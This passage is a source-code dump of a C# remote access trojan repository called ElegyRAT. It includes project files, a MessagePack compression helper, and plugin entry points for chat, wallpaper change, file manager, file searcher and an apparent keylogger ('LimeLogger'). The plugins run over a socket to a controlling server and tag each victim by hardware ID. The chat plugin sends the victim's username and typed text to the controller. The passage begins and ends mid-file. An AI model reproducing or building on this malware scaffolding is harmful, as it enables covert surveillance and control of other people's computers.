16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 | true
26 |
27 |
28 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Client/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/MessagePack/MessagePack/MsgPackType.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace MessagePackLib.MessagePack
8 | {
9 | public enum MsgPackType
10 | {
11 | Unknown = 0,
12 | Null = 1,
13 | Map = 2,
14 | Array = 3,
15 | String = 4,
16 | Integer = 5,
17 | UInt64 = 6,
18 | Boolean = 7,
19 | Float = 8,
20 | Single = 9,
21 | DateTime = 10,
22 | Binary = 11
23 | }
24 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/MessagePack/MessagePack/Zip.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.IO.Compression;
4 |
5 | namespace MessagePackLib.MessagePack
6 | {
7 | public static class Zip
8 | {
9 | public static byte[] Decompress(byte[] input)
10 | {
11 | using (var source = new MemoryStream(input))
12 | {
13 | byte[] lengthBytes = new byte[4];
14 | source.Read(lengthBytes, 0, 4);
15 |
16 | var length = BitConverter.ToInt32(lengthBytes, 0);
17 | using (var decompressionStream = new GZipStream(source,
18 | CompressionMode.Decompress))
19 | {
20 | var result = new byte[length];
21 | decompressionStream.Read(result, 0, length);
22 | return result;
23 | }
24 | }
25 | }
26 |
27 | public static byte[] Compress(byte[] input)
28 | {
29 | using (var result = new MemoryStream())
30 | {
31 | var lengthBytes = BitConverter.GetBytes(input.Length);
32 | result.Write(lengthBytes, 0, 4);
33 |
34 | using (var compressionStream = new GZipStream(result,
35 | CompressionMode.Compress))
36 | {
37 | compressionStream.Write(input, 0, input.Length);
38 | compressionStream.Flush();
39 |
40 | }
41 | return result.ToArray();
42 | }
43 | }
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/MessagePack/MessagePackLib.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {DC199D9E-CF10-41DD-BBCD-98E71BA8679D}
8 | Library
9 | Properties
10 | MessagePackLib
11 | MessagePackLib
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | none
27 | true
28 | bin\Release\
29 | TRACE
30 | prompt
31 | 4
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/MessagePack/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 |
24 | // Version information for an assembly consists of the following four values:
25 | //
26 | // Major Version
27 | // Minor Version
28 | // Build Number
29 | // Revision
30 | //
31 | // You can specify all the values or you can default the Build and Revision Numbers
32 | // by using the '*' as shown below:
33 | // [assembly: AssemblyVersion("1.0.*")]
34 | [assembly: AssemblyVersion("1.0.0.0")]
35 | [assembly: AssemblyFileVersion("1.0.0.0")]
36 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Chat/Chat.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Chat", "Chat\Chat.csproj", "{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {EF9C58BD-EA3A-4488-A8CD-871D19820CE4}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Chat/Chat/FormChat.cs:
--------------------------------------------------------------------------------
1 | using MessagePackLib.MessagePack;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.ComponentModel;
5 | using System.Data;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 |
10 | namespace Plugin
11 | {
12 | public partial class FormChat : Form
13 | {
14 | public FormChat()
15 | {
16 | InitializeComponent();
17 | }
18 |
19 | private void TextBox1_KeyDown(object sender, KeyEventArgs e)
20 | {
21 | if (e.KeyData == Keys.Enter && !string.IsNullOrWhiteSpace(textBox1.Text))
22 | {
23 | richTextBox1.AppendText("Me: " + textBox1.Text + Environment.NewLine);
24 | MsgPack msgpack = new MsgPack();
25 | msgpack.ForcePathObject("Packet").AsString = "chat";
26 | msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
27 | msgpack.ForcePathObject("WriteInput").AsString = Environment.UserName + ": " + textBox1.Text + Environment.NewLine;
28 | Connection.Send(msgpack.Encode2Bytes());
29 | textBox1.Clear();
30 | }
31 | }
32 |
33 | private void FormChat_FormClosing(object sender, FormClosingEventArgs e)
34 | {
35 | e.Cancel = true;
36 | }
37 |
38 | private void Timer1_Tick(object sender, EventArgs e)
39 | {
40 | if (!Connection.IsConnected)
41 | {
42 | Packet.GetFormChat.Invoke((MethodInvoker)(() =>
43 | {
44 | Packet.GetFormChat?.Close();
45 | Packet.GetFormChat?.Dispose();
46 | }));
47 | Connection.Disconnected();
48 | GC.Collect();
49 | }
50 | }
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Chat/Chat/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Chat/Chat/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.Linq;
5 | using System.Net.Security;
6 | using System.Net.Sockets;
7 | using System.Security.Cryptography.X509Certificates;
8 | using System.Text;
9 | using System.Threading;
10 |
11 | namespace Plugin
12 | {
13 | public class Plugin
14 | {
15 | public static Socket Socket;
16 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
17 | {
18 | Debug.WriteLine("Plugin Invoked");
19 | Socket = socket;
20 | Connection.ServerCertificate = certificate;
21 | Connection.Hwid = hwid;
22 | new Thread(() =>
23 | {
24 | Connection.InitializeClient();
25 | }).Start();
26 |
27 | while (Connection.IsConnected)
28 | {
29 | Thread.Sleep(1000);
30 | }
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Chat/Chat/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Chat/Chat/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Extra/Extra.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Extra", "Extra\Extra.csproj", "{424B81BE-2FAC-419F-B4BC-00CCBE38491F}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {4987DF63-DF17-42CF-AB54-BDFDA9768CF0}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Extra/Extra/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Extra/Extra/Handler/Wallpaper.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Drawing;
5 | using System.Drawing.Imaging;
6 | using System.IO;
7 | using System.Linq;
8 | using System.Runtime.InteropServices;
9 | using System.Text;
10 |
11 | namespace Plugin.Handler
12 | {
13 | public class Wallpaper
14 | {
15 | [DllImport("user32.dll")]
16 | public static extern uint SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);
17 | public static readonly uint SPI_SETDESKWALLPAPER = 0x14;
18 | public static readonly uint SPIF_UPDATEINIFILE = 0x01;
19 | public static readonly uint SPIF_SENDWININICHANGE = 0x02;
20 |
21 | public void Change(byte[] img, string exe)
22 | {
23 | string path1 = Path.Combine(Path.GetTempFileName() + exe);
24 | string path2 = Path.Combine(Path.GetTempFileName() + exe);
25 | File.WriteAllBytes(path1, img);
26 |
27 | using (Bitmap bmp = new Bitmap(path1))
28 | using (Graphics graphics = Graphics.FromImage(bmp))
29 | {
30 | bmp.Save(path2, ImageFormat.Bmp);
31 | }
32 | using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Control Panel\Desktop", true))
33 | {
34 | key.SetValue("WallpaperStyle", 2.ToString());
35 | key.SetValue("TileWallpaper", 0.ToString());
36 | }
37 | SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, path2, SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE);
38 | }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Extra/Extra/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Extra/Extra/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System.Diagnostics;
2 | using System.Net.Sockets;
3 | using System.Security.Cryptography.X509Certificates;
4 | using System.Threading;
5 |
6 | namespace Plugin
7 | {
8 | public class Plugin
9 | {
10 | public static Socket Socket;
11 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
12 | {
13 | Debug.WriteLine("Plugin Invoked");
14 | Socket = socket;
15 | Connection.ServerCertificate = certificate;
16 | Connection.Hwid = hwid;
17 | new Thread(() =>
18 | {
19 | Connection.InitializeClient(msgPack);
20 | }).Start();
21 |
22 | while (Connection.IsConnected)
23 | {
24 | Thread.Sleep(1000);
25 | }
26 | }
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Extra/Extra/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("424b81be-2fac-419f-b4bc-00ccbe38491f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Extra/Extra/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileManager/FileManager.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileManager", "FileManager\FileManager.csproj", "{BEE88186-769A-452C-9DD9-D0E0815D92BF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {4FD410CC-1F1D-4948-A108-13285D633CDD}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileManager/FileManager/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileManager/FileManager/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileManager/FileManager/Packet.cs:
--------------------------------------------------------------------------------
1 | using Plugin.Handler;
2 | using MessagePackLib.MessagePack;
3 | using System;
4 | using System.Collections.Generic;
5 | using System.Diagnostics;
6 | using System.IO;
7 | using System.Linq;
8 | using System.Management;
9 | using System.Runtime.InteropServices;
10 | using System.Text;
11 | using System.Threading;
12 |
13 | namespace Plugin
14 | {
15 | public static class Packet
16 | {
17 | public static string FileCopy = null;
18 | public static string ZipPath = null;
19 |
20 | public static void Read(object data)
21 | {
22 | try
23 | {
24 | MsgPack unpack_msgpack = new MsgPack();
25 | unpack_msgpack.DecodeFromBytes((byte[])data);
26 | switch (unpack_msgpack.ForcePathObject("Packet").AsString)
27 | {
28 | case "fileManager":
29 | {
30 | new FileManager(unpack_msgpack);
31 | }
32 | break;
33 | }
34 | }
35 | catch (Exception ex)
36 | {
37 | Error(ex.Message);
38 | }
39 | }
40 |
41 | public static void Error(string ex)
42 | {
43 | MsgPack msgpack = new MsgPack();
44 | msgpack.ForcePathObject("Packet").AsString = "Error";
45 | msgpack.ForcePathObject("Error").AsString = ex;
46 | Connection.Send(msgpack.Encode2Bytes());
47 | }
48 | }
49 |
50 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileManager/FileManager/Plugin.cs:
--------------------------------------------------------------------------------
1 | using MessagePackLib.MessagePack;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 | using System.Linq;
6 | using System.Net.Security;
7 | using System.Net.Sockets;
8 | using System.Security.Cryptography.X509Certificates;
9 | using System.Text;
10 | using System.Threading;
11 |
12 | namespace Plugin
13 | {
14 | public class Plugin
15 | {
16 | public static Socket Socket;
17 | public static Mutex AppMutex;
18 | public static string Mutex;
19 | public static string BDOS;
20 | public static string Install;
21 | public static string InstallFile;
22 |
23 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
24 | {
25 | Debug.WriteLine("Plugin Invoked");
26 | AppMutex = mutex;
27 | Mutex = mtx;
28 | BDOS = bdos;
29 | Install = install;
30 | Socket = socket;
31 | Connection.ServerCertificate = certificate;
32 | Connection.Hwid = hwid;
33 | new Thread(() =>
34 | {
35 | Connection.InitializeClient(msgPack);
36 | }).Start();
37 |
38 | while (Connection.IsConnected)
39 | {
40 | Thread.Sleep(1000);
41 | }
42 | }
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | //[assembly: AssemblyTitle("FileManager")]
9 | //[assembly: AssemblyDescription("")]
10 | //[assembly: AssemblyConfiguration("")]
11 | //[assembly: AssemblyCompany("")]
12 | //[assembly: AssemblyProduct("FileManager")]
13 | //[assembly: AssemblyCopyright("Copyright © 2019")]
14 | //[assembly: AssemblyTrademark("")]
15 | //[assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("bee88186-769a-452c-9dd9-d0e0815d92bf")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileManager/FileManager/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileSearcher/FileSearcher.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30002.166
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileSearcher", "FileSearcher\FileSearcher.csproj", "{9D1D39D8-2387-46ED-A4A8-59D250C97F35}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {3B852AFB-3605-49E9-9364-8EDEF4D95072}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileSearcher/FileSearcher/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileSearcher/FileSearcher/Plugin.cs:
--------------------------------------------------------------------------------
1 | using MessagePackLib.MessagePack;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 | using System.Linq;
6 | using System.Net.Security;
7 | using System.Net.Sockets;
8 | using System.Security.Cryptography.X509Certificates;
9 | using System.Text;
10 | using System.Threading;
11 |
12 | namespace Plugin
13 | {
14 | public class Plugin
15 | {
16 | public static Socket Socket;
17 | public static Mutex AppMutex;
18 | public static string Mutex;
19 | public static string BDOS;
20 | public static string Install;
21 | public static string InstallFile;
22 |
23 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
24 | {
25 | Debug.WriteLine("Plugin Invoked");
26 | AppMutex = mutex;
27 | Mutex = mtx;
28 | BDOS = bdos;
29 | Install = install;
30 | Socket = socket;
31 | Connection.ServerCertificate = certificate;
32 | Connection.Hwid = hwid;
33 | new Thread(() =>
34 | {
35 | Connection.InitializeClient(msgPack);
36 | }).Start();
37 |
38 | while (Connection.IsConnected)
39 | {
40 | Thread.Sleep(1000);
41 | }
42 | }
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileSearcher/FileSearcher/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 |
24 | // Version information for an assembly consists of the following four values:
25 | //
26 | // Major Version
27 | // Minor Version
28 | // Build Number
29 | // Revision
30 | //
31 | // You can specify all the values or you can default the Build and Revision Numbers
32 | // by using the '*' as shown below:
33 | // [assembly: AssemblyVersion("1.0.*")]
34 | [assembly: AssemblyVersion("1.0.0.0")]
35 | [assembly: AssemblyFileVersion("1.0.0.0")]
36 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/FileSearcher/FileSearcher/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/LimeLogger/LimeLogger.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LimeLogger", "LimeLogger\LimeLogger.csproj", "{DAFE686A-461B-402B-BBD7-2A2F4C87C773}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {2E2428AA-B37D-4539-89E0-B88E9A8AE931}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/LimeLogger/LimeLogger/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/LimeLogger/LimeLogger/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/LimeLogger/LimeLogger/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.Linq;
5 | using System.Net.Security;
6 | using System.Net.Sockets;
7 | using System.Security.Cryptography.X509Certificates;
8 | using System.Text;
9 | using System.Threading;
10 |
11 | namespace Plugin
12 | {
13 | public class Plugin
14 | {
15 | public static Socket Socket;
16 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
17 | {
18 | Debug.WriteLine("Plugin Invoked");
19 | Socket = socket;
